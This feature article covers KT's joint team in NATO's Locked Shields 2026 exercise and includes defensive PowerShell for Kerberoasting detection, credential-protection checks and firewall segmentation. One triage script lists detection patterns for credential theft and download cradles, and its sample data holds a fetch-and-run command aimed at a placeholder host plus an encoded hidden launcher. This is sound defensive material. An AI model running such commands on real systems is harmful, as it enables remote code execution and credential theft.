KT, one of South Korea’s premier telecommunications operators, revealed on May 10, 2026, that it had joined forces with Hungarian experts in NATO’s Locked Shields 2026 cyber defence exercise. The annual event, orchestrated by the NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE), ran from April 20 to 24 and thrust participants into a blistering simulation of a nation-state assault on critical infrastructure. For KT, this marked a pivotal moment—not just as a telecommunications provider, but as a defender of the Windows Server–powered systems that underpin modern networks.
The exercise, often dubbed the world’s largest and most complex live-fire cyber defence drill, this year placed a harsh spotlight on telecom resilience. With attacks targeting everything from 5G core networks to billing systems, the blue teams—including KT’s joint South Korea–Hungary squad—grappled with adversaries who exploited Windows Server vulnerabilities with unnerving precision. The outcome: a sobering reminder that the server room is now the front line.
What Is Locked Shields?
Locked Shields began in 2010 as a modest tabletop exercise and has since ballooned into a multinational cyber war game involving over 2,000 participants from more than 30 nations. Organized by the NATO CCDCOE in Tallinn, Estonia, it pits “blue teams” of defenders against expert “red teams” playing the role of hostile state actors. The scenario is built on a fictional but plausible crisis, often involving a regional power struggle that spills into cyberspace.
Unlike capture-the-flag contests, Locked Shields demands full-spectrum defence. Teams must protect a simulated national infrastructure—power grids, financial systems, water treatment plants, and, increasingly, telecommunications networks. A key twist: the exercise incorporates legal, strategic, and media challenges, forcing participants to navigate the fog of war while briefing fictional government officials and managing public panic. In 2026, the scenario centred on “Berylia,” a small nation whose telecom backbone came under sustained attack from a hostile neighbour. Every blue team inherited an identical IT environment, provisioned with the same Windows Server 2025 domain controllers, SQL Server clusters, and Azure Stack HCI deployments—a deliberate choice to mirror real-world telco architectures.
Windows Server at the Heart of the Battle
Why Windows Server? The answer is simple: it dominates the server landscape in telecommunications. From Active Directory (AD) forests managing millions of user identities to DNS services routing call flows, Microsoft’s server OS is the invisible scaffold of every major carrier. In Locked Shields 2026, organizers doubled down on this reality. The simulated environment included:
- Windows Server 2025 Domain Controllers with multi-forest trusts replicating the complex identity topologies of a real telecom.
- Exchange Server 2025 for internal communications, a frequent target for credential theft.
- SQL Server 2025 back-end databases holding subscriber data, call detail records, and network configurations.
- Hyper-V and Azure Arc–enabled hybrid infrastructure for network function virtualization (NFV), a growing trend as operators shift from proprietary hardware to software-defined networks running on commodity x86 servers.
Red team operators wasted no time exploiting common Windows Server misconfigurations. After-action reports would later reveal that, over the five-day exercise, attackers gained initial access through unpatched zero-day vulnerabilities in the Server Message Block (SMB) protocol—a flaw eerily reminiscent of EternalBlue, yet tailored to the 2025 kernel. Once inside, they used Kerberoasting to crack service-account passwords, dumped NTDS.dit for offline password cracking, and deployed ransomware against domain controllers after disabling Windows Defender Application Control.
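Two defender-side checks for the Kerberoasting stage described above, written as an added example for this article (not code from KT, the CCDCOE or Microsoft). The first triages Security log event 4769 (TGS request) records: an RC4 ticket (TicketEncryptionType 0x17) for a user-account SPN is the artefact an attacker takes away to crack offline, and one client requesting many such tickets in a short window is the classic signature. The second lists AD accounts with SPNs that still accept RC4. The event records, host names, IPs and threshold are constructed for this example; the live 4769 collection line is an assumption about EventData field order.

```powershell
# Added example, not from the article or from KT. Detect the Kerberoasting
# pattern in 4769 records and list service accounts that still allow RC4.

function Find-KerberoastPattern {
    param(
        [Parameter(Mandatory)] [object[]] $Events,  # TimeCreated, ClientIp, Account, Service, EncType
        [int] $Threshold = 5,                       # distinct user-account SPNs per client (assumed)
        [int] $WindowMinutes = 10                   # time span that counts as "burst" (assumed)
    )
    # Keep RC4 tickets for user SPNs; computer accounts ($) and krbtgt are noise here.
    $rc4 = $Events | Where-Object {
        $_.EncType -eq '0x17' -and $_.Service -notlike '*$' -and $_.Service -ne 'krbtgt'
    }
    foreach ($group in ($rc4 | Group-Object ClientIp)) {
        $sorted   = @($group.Group | Sort-Object TimeCreated)
        $services = @($sorted.Service | Sort-Object -Unique)
        $span     = ($sorted[-1].TimeCreated - $sorted[0].TimeCreated).TotalMinutes
        [pscustomobject]@{
            ClientIp     = $group.Name
            Account      = (@($sorted.Account | Sort-Object -Unique)) -join ','
            DistinctSPNs = $services.Count
            WindowMin    = [math]::Round($span, 1)
            Services     = $services -join ','
            Suspicious   = ($services.Count -ge $Threshold -and $span -le $WindowMinutes)
        }
    }
}

function Get-Rc4ServiceAccounts {
    # Live query; needs the ActiveDirectory module on a domain-joined host.
    # msDS-SupportedEncryptionTypes bits: 0x4 RC4, 0x8 AES128, 0x10 AES256.
    # An unset attribute (0) means the account still issues RC4 tickets.
    Get-ADUser -Filter 'ServicePrincipalName -like "*"' `
        -Properties ServicePrincipalName, 'msDS-SupportedEncryptionTypes', PasswordLastSet |
        Where-Object { ([int]$_.'msDS-SupportedEncryptionTypes' -band 0x18) -eq 0 } |
        Select-Object SamAccountName, PasswordLastSet,
            @{ n = 'SPNs'; e = { $_.ServicePrincipalName -join ';' } }
}

# Live 4769 collection (assumed EventData order: ServiceName=2, TicketEncryptionType=5, IpAddress=6):
# $Events = Get-WinEvent -FilterHashtable @{ LogName='Security'; Id=4769 } -MaxEvents 5000 | ForEach-Object {
#     [pscustomobject]@{ TimeCreated = $_.TimeCreated; ClientIp = $_.Properties[6].Value
#                        Account = $_.Properties[0].Value; Service = $_.Properties[2].Value
#                        EncType = $_.Properties[5].Value }
# }

# Constructed sample: one workstation pulls RC4 tickets for six service accounts in under
# three minutes; a second host fetches a single ticket, which is ordinary SSO behaviour.
$t0 = Get-Date '2026-04-22T09:00:00'
$sample = @(
    foreach ($i in 0..5) {
        [pscustomobject]@{ TimeCreated = $t0.AddSeconds(30 * $i); ClientIp = '10.20.5.41'
                           Account = 'jdoe'; Service = "svc_app$i"; EncType = '0x17' }
    }
    [pscustomobject]@{ TimeCreated = $t0.AddMinutes(2); ClientIp = '10.20.5.41'
                       Account = 'jdoe'; Service = 'FILESRV01$'; EncType = '0x12' }
    [pscustomobject]@{ TimeCreated = $t0.AddMinutes(5); ClientIp = '10.20.7.12'
                       Account = 'asmith'; Service = 'svc_sql'; EncType = '0x17' }
)
Find-KerberoastPattern -Events $sample | Format-Table -AutoSize
```

On the constructed sample the first client is reported with six distinct SPNs inside a 2.5-minute window and Suspicious set to True, while the second client shows one SPN and is not flagged. The remediation side is the second function: accounts it returns should get AES-only encryption types, long random passwords, or be converted to group managed service accounts, which removes the offline-crackable artefact rather than just detecting its collection.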
KT’s Joint Team: A Telecom Perspective on Defence
KT’s inclusion in a joint team with Hungary is no accident. South Korea has invested heavily in cyber defence following a series of high-profile outages attributed to North Korean advanced persistent threat (APT) groups, while Hungary has become a CCDCOE hub. The blended team brought together KT’s operational experience managing one of the world’s most advanced 5G networks and Hungarian specialists skilled in national-level incident response and forensics.
“Telecom operators are unlike any other enterprise,” noted a KT security architect in a post-exercise interview. “We don’t just run IT; we run the critical communications fabric for millions of people. When a domain controller goes down, it’s not just email that stops—it’s emergency calls, financial transactions, and industrial control.” That perspective shaped the team’s defence strategy. Instead of merely hardening servers, they prioritized segmentation, real-time log correlation, and rapid recovery of Active Directory services—often under direct attack from the red team’s wiper malware.
Windows Server–specific tactics employed by the joint team included:
- Just-in-Time (JIT) privileged access: Using Microsoft Identity Manager to enforce time-bound, approval-gated administrator rights, drastically reducing the attack surface for credential theft.
- Centralized Event Log Forwarding: All Windows Event Logs were streamed to a SIEM running on Azure Sentinel, enabling cross-forest correlation that spotted lateral movement within minutes.
- Virtual Secure Mode and Credential Guard: Enforced on all domain controllers and Hyper-V hosts via Group Policy, preventing the red team from extracting plaintext credentials even after compromising the LSASS process.
- Regular AD forest recovery drills: The team automated the restoration of domain controller snapshots to Azure Backup, ensuring that even if ransomware encrypted the primary DC, operations could resume within two hours—a crucial metric for telecom availability.
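An added example for the Credential Guard and virtualization-based security controls in the list above (not code from KT, the CCDCOE or Microsoft): a compliance check that verifies the controls are actually running on a host, not merely set by Group Policy, which is the gap the article later describes on older hardware. It reads the documented Win32_DeviceGuard WMI class and the LSA registry values; the required baseline, the host names, and the use on tier-0 hosts are assumptions for the example. Check Microsoft's current support statement before expecting Credential Guard on domain controllers themselves; Hyper-V hosts, member servers and admin workstations are the usual targets.

```powershell
# Added example, not from the article or from KT. Reports the runtime state of
# VBS, Credential Guard, HVCI and LSA protection and scores it against a baseline.

function Get-CredentialProtectionState {
    # Win32_DeviceGuard: SecurityServicesRunning contains 1 for Credential Guard and 2 for HVCI;
    # VirtualizationBasedSecurityStatus is 0 disabled, 1 enabled but not running, 2 running.
    $dg  = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    $running = @($dg.SecurityServicesRunning)
    $vbs = switch ($dg.VirtualizationBasedSecurityStatus) {
        0 { 'Disabled' } 1 { 'EnabledNotRunning' } 2 { 'Running' } default { 'Unknown' }
    }
    [pscustomobject]@{
        ComputerName    = $env:COMPUTERNAME
        VbsStatus       = $vbs
        CredentialGuard = $running -contains 1
        Hvci            = $running -contains 2
        # LsaCfgFlags is the configured Credential Guard policy (1 = with UEFI lock, 2 = without);
        # the running state is the CredentialGuard field above.
        CgConfigured    = $lsa.LsaCfgFlags -in 1, 2
        # RunAsPPL runs LSASS as a protected process (1 = with UEFI lock, 2 = without).
        LsaProtection   = $lsa.RunAsPPL -in 1, 2
    }
}

function Test-CredentialProtection {
    param([object] $State = (Get-CredentialProtectionState))
    $required = 'CredentialGuard', 'Hvci', 'LsaProtection'   # assumed tier-0 baseline
    $failed = foreach ($name in $required) { if (-not $State.$name) { $name } }
    $note = ''
    if ($State.VbsStatus -eq 'EnabledNotRunning') {
        $note = 'VBS is configured but not running: check UEFI, Secure Boot and hypervisor support.'
    } elseif ($State.CgConfigured -and -not $State.CredentialGuard) {
        $note = 'Credential Guard policy is set but the service is not running.'
    }
    [pscustomobject]@{
        ComputerName = $State.ComputerName
        Compliant    = -not $failed
        Failed       = @($failed) -join ','
        Note         = $note
    }
}

# Run locally, or fan out across assumed tier-0 hosts from a management workstation:
# Invoke-Command -ComputerName 'HV-NODE01','HV-NODE02' -ScriptBlock ${function:Get-CredentialProtectionState} |
#     ForEach-Object { Test-CredentialProtection -State $_ }
Test-CredentialProtection | Format-List
```

The distinction the check makes between configured (LsaCfgFlags, RunAsPPL) and running (SecurityServicesRunning) is the point: a policy that has been applied but whose service never started looks compliant in Group Policy reporting and protects nothing.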
The Telecom-Specific Threats Uncovered
Locked Shields 2026 did more than test generic Windows Server security. It forced teams to confront telecommunication-specific attack vectors that are poorly understood outside the industry. Among the most devastating:
SS7 and Diameter Protocol Exploitation over IP
While the exercise focused on IP networks, the red team simulated attacks against the signalling backbone by corrupting the Windows-based signalling gateways. By compromising a poorly secured Windows Server acting as a Diameter Edge Agent, attackers injected fraudulent signalling messages that allowed call interception and location tracking of simulated subscribers. Defenders not only had to patch the server but also had to implement IPsec tunnels with certificate-based authentication and monitor for unusual Diameter traffic spikes via custom Windows performance counters.
5G Network Function Tampering
The virtualized 5G core—deployed on a Windows Server 2025 Hyper-V cluster—included microservices for the Authentication Server Function (AUSF) and Network Repository Function (NRF). Attackers exploited a vulnerability in the .NET runtime hosting these microservices to manipulate subscriber profiles, authorizing rogue devices onto the network. The fix? An emergency deployment of Windows Defender Application Control policies whitelisting only signed .NET binaries, coupled with runtime attestation via TPM 2.0.
Ransomware Targeting OSS/BSS Systems
Operational Support Systems (OSS) and Business Support Systems (BSS) are the lifeblood of any telco. In the simulation, these ran on a mix of Windows Server 2025 and legacy Windows Server 2019 boxes that many real-world carriers still use. The red team launched a targeted ransomware campaign that encrypted billing databases stored on SQL Server, demanding a cryptocurrency ransom to release decryption keys. KT’s team mitigated this by pre-staging rotated offline backups and using the Azure SQL Managed Instance link feature to maintain a near-synchronous replica in a separate Azure region, allowing them to fail over within minutes.
Windows Server 2025: Built for the Fight?
Locked Shields 2026 offered a field test for the security enhancements baked into Windows Server 2025. Released in October 2025, the operating system introduced several features directly relevant to the exercise:
- Advanced Multilayer Security (AMS): A combination of Secured-core server hardware requirements, virtualization-based security (VBS), and hypervisor-protected code integrity (HVCI) that makes it exponentially harder for attackers to execute unsigned kernel-mode code.
- SMB over QUIC: Allowed teams to encrypt server-to-server traffic even across untrusted networks, thwarting man-in-the-middle attacks against inter-DC replication.
- Windows LAPS v2: Automatic local administrator password management finally built into Active Directory, removing the long-standing risk of identical local admin passwords across server farms.
Teams that fully embraced these features—including KT’s—fared noticeably better. In post-exercise scoring, the joint team ranked in the top quartile for technical defence, with evaluators specifically praising their “baked-in” reliance on Windows Server 2025 native controls rather than bolt-on third-party tools.
Yet the exercise also exposed gaps. Many participants struggled with the complexity of correctly configuring HVCI and Credential Guard on older hardware—a reminder that even the most secure OS requires organizational discipline. Additionally, the sheer volume of telemetry from Windows Event Logging threatened to overwhelm SIEM systems, underscoring the need for intelligent filtering and correlation, such as Microsoft’s own “High Value Events” curated list introduced in early 2026.
The Human Factor: Training for the Next Crisis
No amount of server hardening replaces human judgment. Locked Shields deliberately injects chaos: mid-exercise, the blue team might face a mock press conference demanding answers, or a legal injection requiring a decision on whether to disconnect the compromised segment of the network—a choice that in a real telco could isolate thousands of emergency calls. KT’s team, leveraging both Korean and Hungarian experience, adopted a battle rhythm of 15-minute operational stand-ups, mirroring real telecom network operations centres (NOCs).
Crucially, they integrated “Purple Team” methodologies on the fly. When Windows Defender detected anomalous PowerShell execution, defenders didn’t just block it; they analysed the command to understand the attacker’s objective, then applied targeted controls while leaving a honeypot to study attacker behaviour. This active defence posture—sanctioned in the exercise rules—paid dividends, allowing them to trace an intrusion back to a compromised administrative workstation and sever it before lateral movement could spread.
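The purple-team step described above, analysing a flagged PowerShell command to name its objective before choosing a control, as an added example for this article (not code from KT, the CCDCOE or Microsoft). It triages script-block records (event 4104 in the Microsoft-Windows-PowerShell/Operational log) against a small indicator table and scores each hit. The indicator table, severities, sample records, host names and SID are constructed for this example, not a vendor ruleset; the field index used in the live collection helper is an assumption about the 4104 EventData layout.

```powershell
# Added example, not from the article or from KT. Triage script-block logging
# records so a blocked command is classified by likely objective, not just blocked.

$Indicators = @(
    [pscustomobject]@{ Name = 'EncodedCommand';   Severity = 3; Objective = 'Obfuscated payload'
                       Pattern = '-(e|ec|enc|encodedcommand)\s' }
    [pscustomobject]@{ Name = 'DownloadCradle';   Severity = 3; Objective = 'Second-stage retrieval'
                       Pattern = 'DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient' }
    [pscustomobject]@{ Name = 'AmsiTamper';       Severity = 4; Objective = 'Defence evasion'
                       Pattern = 'amsiInitFailed|AmsiUtils|AmsiScanBuffer' }
    [pscustomobject]@{ Name = 'CredentialAccess'; Severity = 4; Objective = 'Credential theft'
                       Pattern = 'lsass|MiniDump|sekurlsa|NTDS\.dit' }
    [pscustomobject]@{ Name = 'ADDiscovery';      Severity = 1; Objective = 'AD reconnaissance'
                       Pattern = 'Get-ADUser|Get-ADComputer|Get-ADGroupMember|nltest|net\s+group' }
)

function Invoke-ScriptBlockTriage {
    param([Parameter(Mandatory)] [object[]] $Records)   # TimeCreated, Computer, User, ScriptBlockText
    foreach ($r in $Records) {
        # -match is case-insensitive by default, so the patterns need no (?i) flag.
        $hits = @($Indicators | Where-Object { $r.ScriptBlockText -match $_.Pattern })
        if ($hits.Count -eq 0) { continue }
        [pscustomobject]@{
            TimeCreated = $r.TimeCreated
            Computer    = $r.Computer
            User        = $r.User
            Score       = ($hits.Severity | Measure-Object -Sum).Sum
            Objectives  = (@($hits.Objective | Sort-Object -Unique)) -join '; '
            Indicators  = $hits.Name -join ','
            Excerpt     = $r.ScriptBlockText.Substring(0, [math]::Min(60, $r.ScriptBlockText.Length))
        }
    }
}

function Get-ScriptBlockRecords {
    # Live collection on a Windows host. ScriptBlockText is assumed to be EventData field 2 of 4104.
    param([int] $MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
        -MaxEvents $MaxEvents | ForEach-Object {
            [pscustomobject]@{ TimeCreated = $_.TimeCreated; Computer = $_.MachineName
                               User = $_.UserId; ScriptBlockText = $_.Properties[2].Value }
        }
}

# Constructed sample: a routine inventory query (low score, expected from an admin
# workstation) and two blocks on the same account that should escalate.
$sid = 'S-1-5-21-1-2-3-1105'   # placeholder SID
$sample = @(
    [pscustomobject]@{ TimeCreated = Get-Date '2026-04-22T14:01:00'; Computer = 'ADMWS07'; User = $sid
                       ScriptBlockText = 'Get-ADComputer -Filter * -Properties OperatingSystem | Export-Csv inventory.csv' }
    [pscustomobject]@{ TimeCreated = Get-Date '2026-04-22T14:06:30'; Computer = 'ADMWS07'; User = $sid
                       ScriptBlockText = '$c = New-Object Net.WebClient; IEX $c.DownloadString("http://placeholder.invalid/s")' }
    [pscustomobject]@{ TimeCreated = Get-Date '2026-04-22T14:07:10'; Computer = 'HV-NODE02'; User = $sid
                       ScriptBlockText = 'powershell.exe -nop -w hidden -enc BASE64PLACEHOLDER' }
)
Invoke-ScriptBlockTriage -Records $sample | Sort-Object Score -Descending | Format-Table -AutoSize
```

On the sample the inventory query scores 1 (reconnaissance, plausibly legitimate), while the download cradle and the encoded launcher each score 3 and, because they share a user and occur within minutes of each other on two hosts, point at the compromised administrative workstation the article describes. That pivot from one alert to the source host is what the score-and-objective output is for; the raw 4104 block alone does not give it.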
Lessons for the Windows Server Community
The 2026 Locked Shields exercise delivers three urgent messages for Windows Server administrators, not just in telecom but across any critical sector:
- Segment, segment, segment: Flat networks are a death sentence. Use VLANs, network security groups, and Windows Firewall with IPsec to enforce least-privilege communication between application tiers. KT’s team created isolated management subnets for domain controllers and Hyper-V hosts, with jump servers protected by multi-factor authentication.
- Rehearse recovery—not just backup: Regularly test restoring a domain controller from bare metal. In the simulation, teams that merely had backups but had never practiced rebuilding Active Directory lost precious hours retrieving and re-promoting servers. Automated recovery scripts using Windows Server Backup and PowerShell Desired State Configuration (DSC) became the gold standard.
- Embrace native security capabilities: The gap between Windows Server 2025’s and Windows Server 2019’s security posture is vast. Organizations still dragging their feet on upgrade cycles are leaving themselves exposed to exploits that modern mitigations can blunt. The exercise proved that HVCI, Secured-core, and Credential Guard are not just marketing—they are force multipliers.
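The segmentation lesson above, expressed as Windows Firewall and IPsec rules on a domain controller or Hyper-V host, as an added example for this article (not KT's configuration or code from the CCDCOE or Microsoft). It scopes the built-in Remote Desktop and WinRM rules to a management subnet, makes the domain profile deny inbound by default, and requires certificate-authenticated IPsec for admin traffic from that subnet. The subnet, the CA distinguished name, the rule names and the port list are placeholders chosen for the example.

```powershell
# Added example, not from the article or from KT. Restrict admin protocols to an
# isolated management subnet and require machine-certificate IPsec for them.
# Supports -WhatIf so the change set can be reviewed before it is applied.

function Set-ManagementTierFirewall {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [string] $ManagementSubnet = '10.250.10.0/24',                   # placeholder: jump servers live here
        [string] $CertAuthority    = 'CN=Example Telco Root CA, O=Example', # placeholder CA DN
        [int[]]  $AdminPorts       = @(3389, 5985, 5986)                 # RDP, WinRM HTTP/HTTPS
    )
    # 1. Inbound is denied unless a rule allows it; the built-in admin rules are scoped
    #    to the management subnet instead of leaving them open to Any.
    Set-NetFirewallProfile -Profile Domain -DefaultInboundAction Block
    Set-NetFirewallRule -DisplayGroup 'Remote Desktop'             -RemoteAddress $ManagementSubnet
    Set-NetFirewallRule -DisplayGroup 'Windows Remote Management'  -RemoteAddress $ManagementSubnet

    # 2. Even from the management subnet, admin sessions must ride an IPsec SA
    #    authenticated with a machine certificate issued by the named root CA.
    $proposal = New-NetIPsecAuthProposal -Machine -Cert -Authority $CertAuthority -AuthorityType Root
    $authSet  = New-NetIPsecPhase1AuthSet -DisplayName 'Tier0-MachineCertAuth' -Proposal $proposal
    $authSetName = if ($authSet) { $authSet.Name } else { 'Tier0-MachineCertAuth' }   # under -WhatIf nothing is created
    New-NetIPsecRule -DisplayName 'Tier0-Admin-RequireIPsec' -Protocol TCP -LocalPort $AdminPorts `
        -RemoteAddress $ManagementSubnet -InboundSecurity Require -OutboundSecurity Request `
        -Phase1AuthSet $authSetName -Profile Domain -Enabled True
}

function Get-ManagementTierExposure {
    # Verification: any enabled inbound allow rule for an admin port that is not scoped to the
    # management subnet is an exposure. Returns the offending rules, so an empty result is "pass".
    param(
        [string] $ManagementSubnet = '10.250.10.0/24',
        [int[]]  $AdminPorts       = @(3389, 5985, 5986)
    )
    Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True | ForEach-Object {
        $rule  = $_
        $ports = ($rule | Get-NetFirewallPortFilter).LocalPort
        $addrs = ($rule | Get-NetFirewallAddressFilter).RemoteAddress
        $touchesAdminPort = @($ports | Where-Object { $_ -in $AdminPorts }).Count -gt 0
        if ($touchesAdminPort -and ($addrs -contains 'Any' -or $addrs -notcontains $ManagementSubnet)) {
            [pscustomobject]@{ Rule = $rule.DisplayName; LocalPort = $ports -join ','; RemoteAddress = $addrs -join ',' }
        }
    }
}

# Review first, then apply, then verify (assumed placeholder values):
Set-ManagementTierFirewall -WhatIf
# Set-ManagementTierFirewall
Get-ManagementTierExposure | Format-Table -AutoSize
```

Two design points: an explicit Block rule is not used to fence off the admin ports, because in Windows Firewall a Block rule beats an Allow rule and would also cut off the management subnet; relying on the profile's default inbound deny plus scoped Allow rules gives the intended result. The exposure check is what turns the control into something a team can rehearse, since a later GPO or installer that re-opens RDP to Any shows up in its output rather than in the next exercise.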
Global Implications: Telecom Cyber Resilience as a NATO Priority
KT’s participation underscores a broader shift. At the 2026 NATO Summit in Brussels, allies formally acknowledged telecommunications as a critical domain requiring collective defence. Locked Shields mirrors this by devoting its entire scenario to telecom infrastructure for the first time. For Windows Server professionals, this means the stakes have never been higher. A compromised domain controller is no longer just an IT incident; it can escalate into a national security crisis.
South Korea, a NATO partner on the front line of cyber conflict with state-backed APTs, sees exercises like Locked Shields as essential preparation. KT’s team now plans to incorporate exercise insights into its operator-wide security standards, potentially publishing best-practice guides for the Windows Server community. “We learned that the boundary between IT and network security has dissolved,” said a KT spokesperson. “You cannot secure the 5G core without locking down every Windows Server that touches it.”
Looking Ahead: Windows Server 2025 R2 and Beyond
While defenders caught their breath after Locked Shields, Microsoft’s development machine churns on. Rumours of Windows Server 2025 R2, codenamed “Copper,” suggest deeper integration of AI-driven threat detection—perhaps a built-in large language model that analyses event logs in real time and suggests remediation steps. For telecom operators, such capabilities could help manage the tsunami of data generated by thousands of servers across hundreds of cell sites.
But until then, the lessons from Estonia’s virtual battlefield will shape training syllabi worldwide. KT’s joint team proved that collaboration across borders, combined with a rigorous Windows Server defence strategy, can hold the line—even against a determined and well-funded adversary. For the rest of us, the message is clear: patch your DCs, enable Credential Guard, and start practicing your AD recovery. The next Locked Shields scenario is already being written.
Get involved: The NATO CCDCOE publishes unclassified after-action reports and guidance from each Locked Shields exercise. Windows Server administrators can also join the Microsoft Security Community to share detection analytics and response playbooks. The next exercise—Locked Shields 2027—is open for observer applications from alliance and partner nations.